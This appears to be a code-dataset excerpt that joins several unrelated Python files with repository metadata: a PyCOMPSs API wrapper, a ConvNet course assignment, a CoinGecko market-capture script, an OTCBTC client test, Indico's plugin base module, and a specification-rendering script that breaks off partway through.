_COMPSs.get_directory(app_id, file_name) # noqa
def barrier(app_id: int, no_more_tasks: bool) -> None:
"""Call to barrier.
:param app_id: Application identifier.
:param no_more_tasks: No more tasks boolean.
:return: None
"""
_COMPSs.barrier(app_id, no_more_tasks) # noqa
def barrier_group(app_id: int, group_name: str) -> str:
"""Call barrier_group.
:param app_id: Application identifier.
:param group_name: Group name.
:return: Exception message.
"""
return str(_COMPSs.barrier_group(app_id, group_name)) # noqa
def open_task_group(group_name: str, implicit_barrier: bool, app_id: int) -> None:
"""Call to open_task_group.
:param group_name: Group name.
:param implicit_barrier: Implicit barrier boolean.
:param app_id: Application identifier.
:return: None
"""
_COMPSs.open_task_group(group_name, implicit_barrier, app_id) # noqa
def close_task_group(group_name: str, app_id: int) -> None:
"""Call to close_task_group.
:param group_name: Group name.
:param app_id: Application identifier.
:return: None
"""
_COMPSs.close_task_group(group_name, app_id) # noqa
def get_logging_path() -> str:
"""Call to get_logging_path.
:return: The COMPSs log path
"""
return _COMPSs.get_logging_path() # noqa
def get_number_of_resources(app_id: int) -> int:
"""Call to number_of_resources.
:param app_id: Application identifier
:return: Number of resources
"""
return _COMPSs.get_number_of_resources(app_id) # noqa
def request_resources(app_id: int, num_resources: int, group_name: str) -> None:
"""Call to request_resources.
:param app_id: Application identifier.
:param num_resources: Number of resources.
:param group_name: Group name.
:return: None
"""
_COMPSs.request_resources(app_id, num_resources, group_name) # noqa
def free_resources(app_id: int, num_resources: int, group_name: str) -> None:
"""Call to free_resources.
:param app_id: Application identifier.
:param num_resources: Number of resources.
:param group_name: Group name.
:return: None
"""
_COMPSs.free_resources(app_id, num_resources, group_name) # noqa
def set_wall_clock(app_id: int, wcl: float) -> None:
"""Call to set_wall_clock.
:param app_id: Application identifier.
:param wcl: Wall Clock limit in seconds.
:return: None
"""
_COMPSs.set_wall_clock(app_id, wcl) # noqa
def register_core_element(
ce_signature: str,
impl_signature: typing.Optional[str],
impl_constraints: typing.Optional[str],
impl_type: typing.Optional[str],
impl_io: str,
prolog: typing.List[str],
epilog: typing.List[str],
impl_type_args: typing.List[str]
) -> None:
"""Call to register_core_element.
:param ce_signature: Core element signature
:param impl_signature: Implementation signature
:param impl_constraints: Implementation constraints
:param impl_type: Implementation type
:param impl_io: Implementation IO
:param prolog: [binary, params, fail_by_exit_value] of the prolog
:param epilog: [binary, params, fail_by_exit_value] of the epilog
:param impl_type_args: Implementation type arguments
:return: None
"""
_COMPSs.register_core_element(
ce_signature, # noqa
impl_signature,
impl_constraints,
impl_type,
impl_io,
prolog,
epilog,
impl_type_args,
)
def process_task(
app_id: int,
signature: str,
on_failure: str,
time_out: int,
has_priority: bool,
num_nodes: int,
reduction: bool,
chunk_size: int,
replicated: bool,
distributed: bool,
has_target: bool,
num_returns: int,
values: list,
names: list,
compss_types: list,
compss_directions: list,
compss_streams: list,
compss_prefixes: list,
content_types: list,
weights: list,
keep_renames: list,
) -> None:
"""Call to process_task.
:param app_id: Application identifier
:param signature: Task signature
:param on_failure: On failure action
:param time_out: Task time out
:param has_priority: Boolean has priority
:param num_nodes: Number of nodes
:param reduction: Boolean indicating if the task is of type reduce
:param chunk_size: Size of chunks for executing the reduce operation
:param replicated: Boolean is replicated
:param distributed: Boolean is distributed
:param has_target: Boolean has target
:param num_returns: Number of returns
:param values: Values
:param names: Names
:param compss_types: COMPSs types
:param compss_directions: COMPSs directions
:param compss_streams: COMPSs streams
:param compss_prefixes: COMPSs prefixes
:param content_types: COMPSs types
:param weights: Parameter weights
:param keep_renames: Boolean keep renames
:return: None
"""
_COMPSs.process_task(
app_id, # noqa
signature,
on_failure,
time_out,
has_priority,
num_nodes,
reduction,
chunk_size,
replicated,
distributed,
has_target,
num_returns,
values,
names,
compss_types,
compss_directions,
compss_streams,
compss_prefixes,
content_types,
weights,
keep_renames,
)
def process_http_task(
app_id: int,
signature: str,
on_failure: str,
time_out: int,
has_priority: bool,
num_nodes: int,
reduction: bool,
chunk_size: int,
replicated: bool,
distributed: bool,
has_target: bool,
num_returns: int,
values: list,
names: list,
compss_types: list,
compss_directions: list,
compss_streams: list,
compss_prefixes: list,
content_types: list,
weights: list,
keep_renames: list,
) -> None:
"""Call to process_http_task.
:param app_id: Application identifier
:param signature: Task signature
:param on_failure: On failure action
:param time_out: Task time out
:param has_priority: Boolean has priority
:param num_nodes: Number of nodes
:param reduction: Boolean indicating if the task is of type reduce
:param chunk_size: Size of chunks for executing the reduce operation
:param replicated: Boolean is replicated
:param distributed: Boolean is distributed
:param has_target: Boolean has target
:param num_returns: Number of returns
:param values: Values
:param names: Names
:param compss_types: COMPSs types
:param compss_directions: COMPSs directions
:param compss_streams: COMPSs streams
:param compss_prefixes: COMPSs prefixes
:param content_types: COMPSs types
:param weights: Parameter weights
:param keep_renames: Boolean keep renames
:return: None
"""
_COMPSs.process_http_task(
app_id, # noqa
signature,
on_failure,
time_out,
has_priority,
num_nodes,
reduction,
chunk_size,
replicated,
distributed,
has_target,
num_returns,
values,
names,
compss_types,
compss_directions,
compss_streams,
compss_prefixes,
content_types,
weights,
keep_renames,
)
def set_pipes(pipe_in: str, pipe_out: str) -> None:
"""Set nesting pipes.
:param pipe_in: Input pipe.
:param pipe_out: Output pipe.
:return: None
"""
_COMPSs.set_pipes(pipe_in, pipe_out) # noqa
def read_pipes() -> str:
"""Call to read_pipes.
:return: The command read from the pipe
"""
o = _COMPSs.read_pipes() # noqa
return o
| 27
| 85
| 0.658929
|
abac7832d832f62bcee80f9f3c287b3619efe3a4
| 3,588
|
py
|
Python
|
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | 1
|
2019-03-27T09:18:47.000Z
|
2019-03-27T09:18:47.000Z
|
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | null | null | null |
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | null | null | null |
import numpy as np
from layers import (
FullyConnectedLayer, ReLULayer,
ConvolutionalLayer, MaxPoolingLayer, Flattener,
softmax_with_cross_entropy, l2_regularization, softmax
)
class ConvNet:
"""
Implements a very simple conv net
Input -> Conv[3x3] -> Relu -> Maxpool[4x4] ->
Conv[3x3] -> Relu -> MaxPool[4x4] ->
Flatten -> FC -> Softmax
"""
def __init__(self, input_shape, n_output_classes, conv1_channels, conv2_channels, reg=0):
"""
Initializes the neural network
Arguments:
input_shape, tuple of 3 ints - image_width, image_height, n_channels
Will be equal to (32, 32, 3)
n_output_classes, int - number of classes to predict
conv1_channels, int - number of filters in the 1st conv layer
conv2_channels, int - number of filters in the 2nd conv layer
"""
self.reg = reg
# TODO Create necessary layers
        assert input_shape[0] % 4 == 0 and input_shape[1] % 4 == 0, "Invalid input_shape value"
self.layers = [ConvolutionalLayer(input_shape[2], conv1_channels, 3, 0),
ReLULayer(),
MaxPoolingLayer(4, 4),
ConvolutionalLayer(conv1_channels, conv2_channels, 3, 0),
ReLULayer(),
MaxPoolingLayer(4, 4),
Flattener(),
FullyConnectedLayer(4 * conv2_channels, n_output_classes)
]
def compute_loss_and_gradients(self, X, y):
"""
Computes total loss and updates parameter gradients
on a batch of training examples
Arguments:
X, np array (batch_size, height, width, input_features) - input data
y, np array of int (batch_size) - classes
"""
# Before running forward and backward pass through the model,
# clear parameter gradients aggregated from the previous pass
# TODO Compute loss and fill param gradients
# Don't worry about implementing L2 regularization, we will not
# need it in this assignment
for layer in self.layers:
if {'W', 'B'} <= set(layer.params()):
layer.W.grad = np.zeros(layer.W.value.shape)
layer.B.grad = np.zeros(layer.B.value.shape)
forward_val = X
for layer in self.layers:
forward_val = layer.forward(forward_val)
loss, backward_val = softmax_with_cross_entropy(forward_val, y)
for layer in self.layers[::-1]:
backward_val = layer.backward(backward_val)
for layer in self.layers:
for param_name, param in layer.params().items():
loss_reg, grad_reg = l2_regularization(param.value, self.reg)
loss += loss_reg
param.grad += grad_reg
return loss
def predict(self, X):
# You can probably copy the code from previous assignment
forward_val = X
for layer in self.layers:
forward_val = layer.forward(forward_val)
pred = np.argmax(softmax(forward_val), axis=1)
return pred
def params(self):
result = {}
# TODO: Aggregate all the params from all the layers
# which have parameters
for ind, layer in enumerate(self.layers):
for param in layer.params().items():
result['layer_' + str(ind/2+1) + '_' + param[0]] = param[1]
return result
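# Minimal usage sketch (illustrative shapes/values; relies only on the constructor and
# methods defined above):
#   model = ConvNet(input_shape=(32, 32, 3), n_output_classes=10,
#                   conv1_channels=16, conv2_channels=32)
#   loss = model.compute_loss_and_gradients(X_batch, y_batch)  # X_batch: (N, 32, 32, 3), y_batch: (N,)
#   predictions = model.predict(X_batch)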
| 39
| 93
| 0.585006
|
dc74f6efda221819ef086f329a77909174662beb
| 4,536
|
py
|
Python
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 12
|
2021-04-12T23:19:55.000Z
|
2021-09-06T21:56:26.000Z
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 70
|
2021-04-05T19:48:22.000Z
|
2021-09-21T14:00:06.000Z
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 15
|
2021-04-27T04:15:14.000Z
|
2021-09-08T15:21:00.000Z
|
# _*_ encoding:utf-8 _*_
# This script calculates index market capture by day through the CoinGecko API.
# market capture = index market cap / sum(each composition's market cap in the index)
# prerequisites:
# 1. install the CoinGecko API python library https://github.com/man-c/pycoingecko
# 2. prepare index composition info as a csv file which contains when a coin is added to
#    or removed from the index and its id in CoinGecko, e.g. dpi_index.csv, mvi_index.csv.
# maintenance: each time a coin is added to or removed from an index the csv file must change accordingly.
# the result is saved as a csv file which contains the index market capture by day.
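# Illustrative example (made-up numbers): if the index market cap is 150M USD and the summed
# market cap of its compositions is 5,000M USD, market capture = 150 / 5000 * 100 = 3.0 (%).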
from pycoingecko import CoinGeckoAPI
import pandas as pd
import numpy as np
import time
import datetime
today = datetime.datetime.now().strftime("%Y-%m-%d")
# connect coingecko api
cg = CoinGeckoAPI()
def time_to_unix(str_time):
"""
    convert str time to unix timestamp
:param str_time: yyyy-mm-dd
:return: timestamp
"""
return time.mktime(time.strptime(str_time, "%Y-%m-%d"))
def get_index_compositions_market_cap(compositions_table):
"""
get index compositions market cap by day
:param compositions_table: dataframe which contains index composition info
:return: dataframe which is index compositions marketcap by day
"""
coins_cap = pd.DataFrame(columns=['dates','coinscap','coins'])
count = 0
for coin in compositions_table.values:
coin_id = coin[4]
from_timestamp = time_to_unix(coin[2])
if coin[2] == coin[3]:
to_timestamp = time_to_unix(today)
else:
to_timestamp = time_to_unix(coin[3])
datas = cg.get_coin_market_chart_range_by_id(id=coin_id,vs_currency='usd',from_timestamp=from_timestamp,to_timestamp=to_timestamp)
datas_df = pd.DataFrame(datas['market_caps'],columns=['dates','coinscap'])
datas_df['coins'] = coin[1]
coins_cap=coins_cap.append(datas_df)
time.sleep(5)
count += 1
        print('round %d, got market cap of %s' % (count, coin_id))
coins_cap['days'] = pd.to_datetime(coins_cap['dates'], unit='ms').dt.date
coins_cap = coins_cap.groupby(['coins', 'days']).nth(0).reset_index()
coins_cap = coins_cap.groupby('days')['coinscap'].sum().reset_index()
return coins_cap
def get_index_market_cap(id,from_time):
"""
get index marketcap
    :param id: coingecko id
:param from_time: index start time yyyy-mm-dd
:return: dataframe which contains days and marketcap
"""
from_timestamp = time_to_unix(from_time)
to_timestamp = time_to_unix(today)
index_caps = cg.get_coin_market_chart_range_by_id(id=id, vs_currency='usd',
from_timestamp=from_timestamp, to_timestamp=to_timestamp)
index_df = pd.DataFrame(index_caps['market_caps'], columns=['dates', 'index_marketcap'])
index_df['days'] = pd.to_datetime(index_df['dates'], unit='ms').dt.date
index_df = index_df.drop(columns='dates')
index_df = index_df.groupby('days').nth(0).reset_index()
return index_df
def get_index_market_capture(index_info_dir,id,from_time):
"""
get index market capture
:param index_info_dir: dir of index info table
:param id: coingecko id of index
:param from_time: index start time yyyy-mm-dd
:return: dataframe, compositions and index market cap by day
"""
# read dpi composition info
index_table = pd.read_csv(index_info_dir)
coins_cap = get_index_compositions_market_cap(index_table)
index_cap = get_index_market_cap(id,from_time)
market_capture = index_cap.merge(coins_cap, on='days', how='left')
market_capture['market_capture'] = market_capture['index_marketcap'] / market_capture['coinscap']*100
return market_capture.round(3)
if __name__ == '__main__':
# dpi market capture
dpi_market_capture = get_index_market_capture(index_info_dir='./dpi_index.csv',id='defipulse-index',from_time='2020-09-10')
# save result as dpi_market_capture.csv
dpi_market_capture.to_csv('./dpi_market_capture.csv',columns = ['days','index_marketcap','coinscap','market_capture'],index=False)
# mvi market capture
mvi_market_capture = get_index_market_capture(index_info_dir='./mvi_index.csv',id='metaverse-index',from_time='2021-04-06')
# save result as mvi_market_capture.csv
mvi_market_capture.to_csv('./mvi_market_capture.csv',columns = ['days','index_marketcap','coinscap','market_capture'],index=False)
| 41.236364
| 138
| 0.710317
|
604399ec058c935b0fa2b15ddcc7929f53b87969
| 53
|
py
|
Python
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 19
|
2017-10-23T14:52:51.000Z
|
2022-03-28T04:49:00.000Z
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 194
|
2017-11-01T17:32:45.000Z
|
2022-03-31T21:32:59.000Z
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 16
|
2017-11-01T05:18:04.000Z
|
2021-12-14T23:08:57.000Z
|
from astrodata import version
__version__ = version()
| 26.5
| 29
| 0.830189
|
d9dd312f4105999d1bfc7f48b5c0b7f0d429a6f9
| 1,284
|
py
|
Python
|
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | 6
|
2018-05-20T13:51:41.000Z
|
2019-08-01T10:44:22.000Z
|
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | null | null | null |
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | 2
|
2018-12-03T01:12:17.000Z
|
2019-02-20T04:52:20.000Z
|
# coding: utf-8
import responses
from otcbtc_client.client import OTCBTCClient
class TestMarket(object):
@property
def market(self):
return OTCBTCClient().market
@responses.activate
def test_all(self):
market = self.market
responses.add(
responses.GET,
market.build_url(market.URI),
json=[
{
                    'id': 'otbeth',  # Unique market id.
'ticker_id': 'btc_eth', # Unique ticker id.
'name': 'BTC/ETH' # market name
},
{
'id': 'otbeth',
'ticker_id': 'otb_eth',
'name': 'OTB/ETH'
},
{
'id': 'eoseth',
'ticker_id': 'eos_eth',
'name': 'EOS/ETH'
},
{
'id': 'bcheth',
'ticker_id': 'bch_eth',
'name': 'BCH/ETH'
},
],
match_querystring=True)
resp = market.all()
assert resp[0]
assert resp[0]['id'] == 'otbeth'
assert resp[0]['ticker_id'] == 'btc_eth'
assert resp[0]['name'] == 'BTC/ETH'
| 27.319149
| 64
| 0.403427
|
74fe6e0d5b67ca356c7437271329a3aa10889a2e
| 13,858
|
py
|
Python
|
indico/core/plugins/__init__.py
|
uxmaster/indico
|
ecd19f17ef6fdc9f5584f59c87ec647319ce5d31
|
[
"MIT"
] | 1
|
2019-11-03T11:34:16.000Z
|
2019-11-03T11:34:16.000Z
|
indico/core/plugins/__init__.py
|
NP-compete/indico
|
80db7ca0ef9d1f3240a16b9ff2d84bf0bf26c549
|
[
"MIT"
] | null | null | null |
indico/core/plugins/__init__.py
|
NP-compete/indico
|
80db7ca0ef9d1f3240a16b9ff2d84bf0bf26c549
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
import errno
import json
import os
from flask import g, session
from flask_babelex import Domain
from flask_pluginengine import (Plugin, PluginBlueprintMixin, PluginBlueprintSetupStateMixin, PluginEngine,
current_plugin, render_plugin_template, wrap_in_plugin_context)
from werkzeug.utils import cached_property
from indico.core import signals
from indico.core.db import db
from indico.core.db.sqlalchemy.util.models import import_all_models
from indico.core.logger import Logger
from indico.core.settings import SettingsProxy
from indico.core.webpack import IndicoManifestLoader
from indico.modules.events.settings import EventSettingsProxy
from indico.modules.events.static.util import RewrittenManifest
from indico.modules.users import UserSettingsProxy
from indico.util.decorators import cached_classproperty, classproperty
from indico.util.i18n import NullDomain, _
from indico.util.struct.enum import IndicoEnum
from indico.web.flask.templating import get_template_module, register_template_hook
from indico.web.flask.util import url_for, url_rule_to_js
from indico.web.flask.wrappers import IndicoBlueprint, IndicoBlueprintSetupState
from indico.web.menu import SideMenuItem
from indico.web.views import WPJinjaMixin
class PluginCategory(unicode, IndicoEnum):
search = _('Search')
synchronization = _('Synchronization')
payment = _('Payment')
importers = _('Importers')
videoconference = _('Videoconference')
other = _('Other')
class IndicoPlugin(Plugin):
"""Base class for an Indico plugin
All your plugins need to inherit from this class. It extends the
`Plugin` class from Flask-PluginEngine with useful indico-specific
functionality that makes it easier to write custom plugins.
When creating your plugin, the class-level docstring is used to
generate the friendly name and description of a plugin. Its first
line becomes the name while everything else goes into the description.
This class provides methods for some of the more common hooks Indico
provides. Additional signals are defined in :mod:`~indico.core.signals`
and can be connected to custom functions using :meth:`connect`.
"""
#: WTForm for the plugin's settings (requires `configurable=True`).
#: All fields must return JSON-serializable types.
settings_form = None
#: A dictionary which can contain the kwargs for a specific field in the `settings_form`.
settings_form_field_opts = {}
#: A dictionary containing default values for settings
default_settings = {}
#: A dictionary containing default values for event-specific settings
default_event_settings = {}
#: A dictionary containing default values for user-specific settings
default_user_settings = {}
#: A set containing the names of settings which store ACLs
acl_settings = frozenset()
#: A set containing the names of event-specific settings which store ACLs
acl_event_settings = frozenset()
#: A dict containing custom converters for settings
settings_converters = {}
#: A dict containing custom converters for event-specific settings
event_settings_converters = {}
#: A dict containing custom converters for user-specific settings
user_settings_converters = {}
#: If the plugin should link to a details/config page in the admin interface
configurable = False
#: The group category that the plugin belongs to
category = None
#: If `settings`, `event_settings` and `user_settings` should use strict
#: mode, i.e. only allow keys in `default_settings`, `default_event_settings`
#: or `default_user_settings` (or the related `acl_settings` sets).
#: This should not be disabled in most cases; if you need to store arbitrary
#: keys, consider storing a dict inside a single top-level setting.
strict_settings = True
def init(self):
"""Called when the plugin is being loaded/initialized.
If you want to run custom initialization code, this is the
method to override. Make sure to call the base method or
the other overridable methods in this class will not be
called anymore.
"""
assert self.configurable or not self.settings_form, 'Non-configurable plugin cannot have a settings form'
self.alembic_versions_path = os.path.join(self.root_path, 'migrations')
self.connect(signals.plugin.get_blueprints, lambda app: self.get_blueprints())
self.template_hook('vars-js', self.inject_vars_js)
self._import_models()
def _import_models(self):
old_models = set(db.Model._decl_class_registry.items())
import_all_models(self.package_name)
added_models = set(db.Model._decl_class_registry.items()) - old_models
# Ensure that only plugin schemas have been touched. It would be nice if we could actually
# restrict a plugin to plugin_PLUGNNAME but since we load all models from the plugin's package
# which could contain more than one plugin this is not easily possible.
for name, model in added_models:
schema = model.__table__.schema
if not schema.startswith('plugin_'):
raise Exception("Plugin '{}' added a model which is not in a plugin schema ('{}' in '{}')"
.format(self.name, name, schema))
def connect(self, signal, receiver, **connect_kwargs):
connect_kwargs['weak'] = False
func = wrap_in_plugin_context(self, receiver)
func.indico_plugin = self
signal.connect(func, **connect_kwargs)
def get_blueprints(self):
"""Return blueprints to be registered on the application
A single blueprint can be returned directly, for multiple blueprint you need
to yield them or return an iterable.
"""
pass
def get_vars_js(self):
"""Return a dictionary with variables to be added to vars.js file"""
return None
@cached_property
def translation_path(self):
"""
Return translation files to be used by the plugin.
By default, get <root_path>/translations, unless it does not exist
"""
translations_path = os.path.join(self.root_path, 'translations')
return translations_path if os.path.exists(translations_path) else None
@cached_property
def translation_domain(self):
"""Return the domain for this plugin's translation_path"""
path = self.translation_path
return Domain(path) if path else NullDomain()
def _get_manifest(self):
try:
loader = IndicoManifestLoader(custom=False)
return loader.load(os.path.join(self.root_path, 'static', 'dist', 'manifest.json'))
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
return None
@property
def manifest(self):
if g.get('static_site') and 'custom_manifests' in g:
try:
return g.custom_manifests[self.name]
except KeyError:
manifest = self._get_manifest()
g.custom_manifests[self.name] = RewrittenManifest(manifest) if manifest else None
return g.custom_manifests[self.name]
return self._get_manifest()
def inject_bundle(self, name, view_class=None, subclasses=True, condition=None):
"""Injects an asset bundle into Indico's pages
:param name: Name of the bundle
:param view_class: If a WP class is specified, only inject it into pages using that class
:param subclasses: also inject into subclasses of `view_class`
        :param condition: a callable to determine whether to inject or not; only called when
                          the view_class criterion matches
"""
def _do_inject(sender):
if condition is None or condition():
return self.manifest[name]
if view_class is None:
self.connect(signals.plugin.inject_bundle, _do_inject)
elif not subclasses:
self.connect(signals.plugin.inject_bundle, _do_inject, sender=view_class)
else:
def _func(sender):
if issubclass(sender, view_class):
return _do_inject(sender)
self.connect(signals.plugin.inject_bundle, _func)
def inject_vars_js(self):
"""Returns a string that will define variables for the plugin in the vars.js file"""
vars_js = self.get_vars_js()
if vars_js:
return 'var {}Plugin = {};'.format(self.name.title(), json.dumps(vars_js))
def template_hook(self, name, receiver, priority=50, markup=True):
"""Registers a function to be called when a template hook is invoked.
For details see :func:`~indico.web.flask.templating.register_template_hook`
"""
register_template_hook(name, receiver, priority, markup, self)
@classproperty
@classmethod
def logger(cls):
return Logger.get('plugin.{}'.format(cls.name))
@cached_classproperty
@classmethod
def settings(cls):
""":class:`SettingsProxy` for the plugin's settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return SettingsProxy('plugin_{}'.format(cls.name), instance.default_settings, cls.strict_settings,
acls=cls.acl_settings, converters=cls.settings_converters)
@cached_classproperty
@classmethod
def event_settings(cls):
""":class:`EventSettingsProxy` for the plugin's event-specific settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return EventSettingsProxy('plugin_{}'.format(cls.name), instance.default_event_settings,
cls.strict_settings, acls=cls.acl_event_settings,
converters=cls.event_settings_converters)
@cached_classproperty
@classmethod
def user_settings(cls):
""":class:`UserSettingsProxy` for the plugin's user-specific settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return UserSettingsProxy('plugin_{}'.format(cls.name), instance.default_user_settings,
cls.strict_settings, converters=cls.user_settings_converters)
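# A minimal plugin sketch (illustrative only; the class name, bundle name, settings and
# blueprint are hypothetical, the hooks used are the ones defined above):
#
#     class ExamplePlugin(IndicoPlugin):
#         """Example Plugin
#
#         The first docstring line becomes the friendly name, the rest the description.
#         """
#         configurable = True
#         default_settings = {'greeting': 'hello'}
#
#         def init(self):
#             super(ExamplePlugin, self).init()
#             self.inject_bundle('example.js')  # hypothetical bundle name
#
#         def get_blueprints(self):
#             return example_blueprint  # an IndicoPluginBlueprint instance (hypothetical)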
def plugin_url_rule_to_js(endpoint):
"""Like :func:`~indico.web.flask.util.url_rule_to_js` but prepending plugin name prefix to the endpoint"""
if '.' in endpoint[1:]: # 'foo' or '.foo' should not get the prefix
endpoint = 'plugin_{}'.format(endpoint)
return url_rule_to_js(endpoint)
def url_for_plugin(endpoint, *targets, **values):
"""Like :func:`~indico.web.flask.util.url_for` but prepending ``'plugin_'`` to the blueprint name."""
if '.' in endpoint[1:]: # 'foo' or '.foo' should not get the prefix
endpoint = 'plugin_{}'.format(endpoint)
return url_for(endpoint, *targets, **values)
def get_plugin_template_module(template_name, **context):
"""Like :func:`~indico.web.flask.templating.get_template_module`, but using plugin templates"""
template_name = '{}:{}'.format(current_plugin.name, template_name)
return get_template_module(template_name, **context)
class IndicoPluginEngine(PluginEngine):
plugin_class = IndicoPlugin
class IndicoPluginBlueprintSetupState(PluginBlueprintSetupStateMixin, IndicoBlueprintSetupState):
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
if rule.startswith('/static'):
with self._unprefixed():
super(IndicoPluginBlueprintSetupState, self).add_url_rule(rule, endpoint, view_func, **options)
else:
super(IndicoPluginBlueprintSetupState, self).add_url_rule(rule, endpoint, view_func, **options)
class IndicoPluginBlueprint(PluginBlueprintMixin, IndicoBlueprint):
"""The Blueprint class all plugins need to use.
It contains the necessary logic to run the blueprint's view
functions inside the correct plugin context and to make the
static folder work.
"""
def make_setup_state(self, app, options, first_registration=False):
return IndicoPluginBlueprintSetupState(self, app, options, first_registration)
class WPJinjaMixinPlugin(WPJinjaMixin):
render_template_func = staticmethod(render_plugin_template)
# This is the same value as in WPJinjaMixin but NOT redundant:
# A plugin may have a WP inheriting from `WPJinjaMixinPlugin, WPSomethingElse`
# to get the render_template_func from here while `WPSomethingElse`
# already sets a template prefix and also inherits from WPJinjaMixin,
# in which case the WPJinjaMixin from here would be skipped due to how
# Python's MRO works and thus the template prefix would not be cleared.
template_prefix = ''
@signals.menu.items.connect_via('admin-sidemenu')
def _extend_admin_menu(sender, **kwargs):
if session.user.is_admin:
return SideMenuItem('plugins', _('Plugins'), url_for('plugins.index'), 80, icon='puzzle')
plugin_engine = IndicoPluginEngine()
| 43.716088
| 113
| 0.697864
|
bfbe59f9fe21f776c42909a8ac5263b16ccfe7da
| 6,615
|
py
|
Python
|
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | null | null | null |
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | 6
|
2020-07-14T07:55:38.000Z
|
2022-01-11T09:50:59.000Z
|
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | 2
|
2022-01-06T14:29:05.000Z
|
2022-01-07T09:52:52.000Z
|
#!/usr/bin/env python3
import os
import csv
import jinja2
import markdown
from digital_land_frontend.jinja import setup_jinja
docs = "docs/"
staticPath = "https://digital-land.github.io"
assetPath = "https://digital-land.github.io"
keys = {
"dataset-field": ["dataset", "field"],
"datapackage-dataset": ["datapackage", "dataset"],
}
tables = {
"datapackage": {},
"datapackage-dataset": {},
"datatype": {},
"field": {},
"typology": {},
"dataset": {},
"dataset-field": {},
}
def render(path, template, docs="docs", **kwargs):
path = os.path.join(docs, path)
directory = os.path.dirname(path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(path, "w") as f:
print(f"creating {path}")
f.write(template.render(**kwargs))
def load(table):
for row in csv.DictReader(open("specification/%s.csv" % (table), newline="")):
if table not in keys:
key = table
tables[table][row[key]] = row
else:
pkey, skey = keys[table]
tables[table].setdefault(row[pkey], {})
tables[table][row[pkey]][row[skey]] = row
def field_typology(f):
if f["parent-field"] == "" or f["field"] == f["parent-field"]:
return f["parent-field"]
return field_typology(tables["field"][f["parent-field"]])
def index_typologies():
tables["typology-datatype"] = {}
tables["typology-field"] = {}
tables["typology-dataset"] = {}
for field, f in tables["field"].items():
typology = field_typology(f)
tables["field"][field]["typology"] = typology
tables["typology-field"].setdefault(typology, [])
tables["typology-field"][typology].append(field)
datatype = f["datatype"]
tables["typology-datatype"].setdefault(typology, [])
if datatype not in tables["typology-datatype"][typology]:
tables["typology-datatype"][typology].append(datatype)
if field in tables["dataset"]:
tables["typology-dataset"].setdefault(typology, [])
tables["typology-dataset"][typology].append(field)
def index_datatype():
tables["datatype-field"] = {}
tables["datatype-dataset"] = {}
for field, f in tables["field"].items():
datatype = f["datatype"]
tables["datatype-field"].setdefault(datatype, [])
tables["datatype-field"][datatype].append(field)
if field in tables["dataset"]:
tables["datatype-dataset"].setdefault(datatype, [])
tables["datatype-dataset"][datatype].append(field)
def base_field(field):
f = tables["field"][field]
if f["cardinality"] == "1":
return field
return f["parent-field"]
def index_dataset():
tables["dataset-datapackage"] = {}
for datapackage, d in tables["datapackage-dataset"].items():
for dataset in d:
tables["dataset-datapackage"].setdefault(dataset, [])
tables["dataset-datapackage"][dataset].append(datapackage)
tables["dataset-to"] = {}
tables["dataset-from"] = {}
for dataset, s in tables["dataset-field"].items():
for name in s:
field = base_field(name)
if field != dataset and field in tables["dataset"]:
tables["dataset-to"].setdefault(dataset, [])
if field not in tables["dataset-to"][dataset]:
tables["dataset-to"][dataset].append(field)
tables["dataset-from"].setdefault(field, [])
if dataset not in tables["dataset-from"][field]:
tables["dataset-from"][field].append(dataset)
def index_field():
tables["field-dataset"] = {}
for dataset, s in tables["dataset-field"].items():
for field in s:
tables["field-dataset"].setdefault(field, [])
tables["field-dataset"][field].append(dataset)
def index_datapackage():
tables["field-datapackage"] = {}
for datapackage, d in tables["datapackage-dataset"].items():
for dataset in d:
for field in tables["dataset-field"][dataset]:
tables["field-datapackage"].setdefault(field, [])
if datapackage not in tables["field-datapackage"][field]:
tables["field-datapackage"][field].append(datapackage)
def default_names():
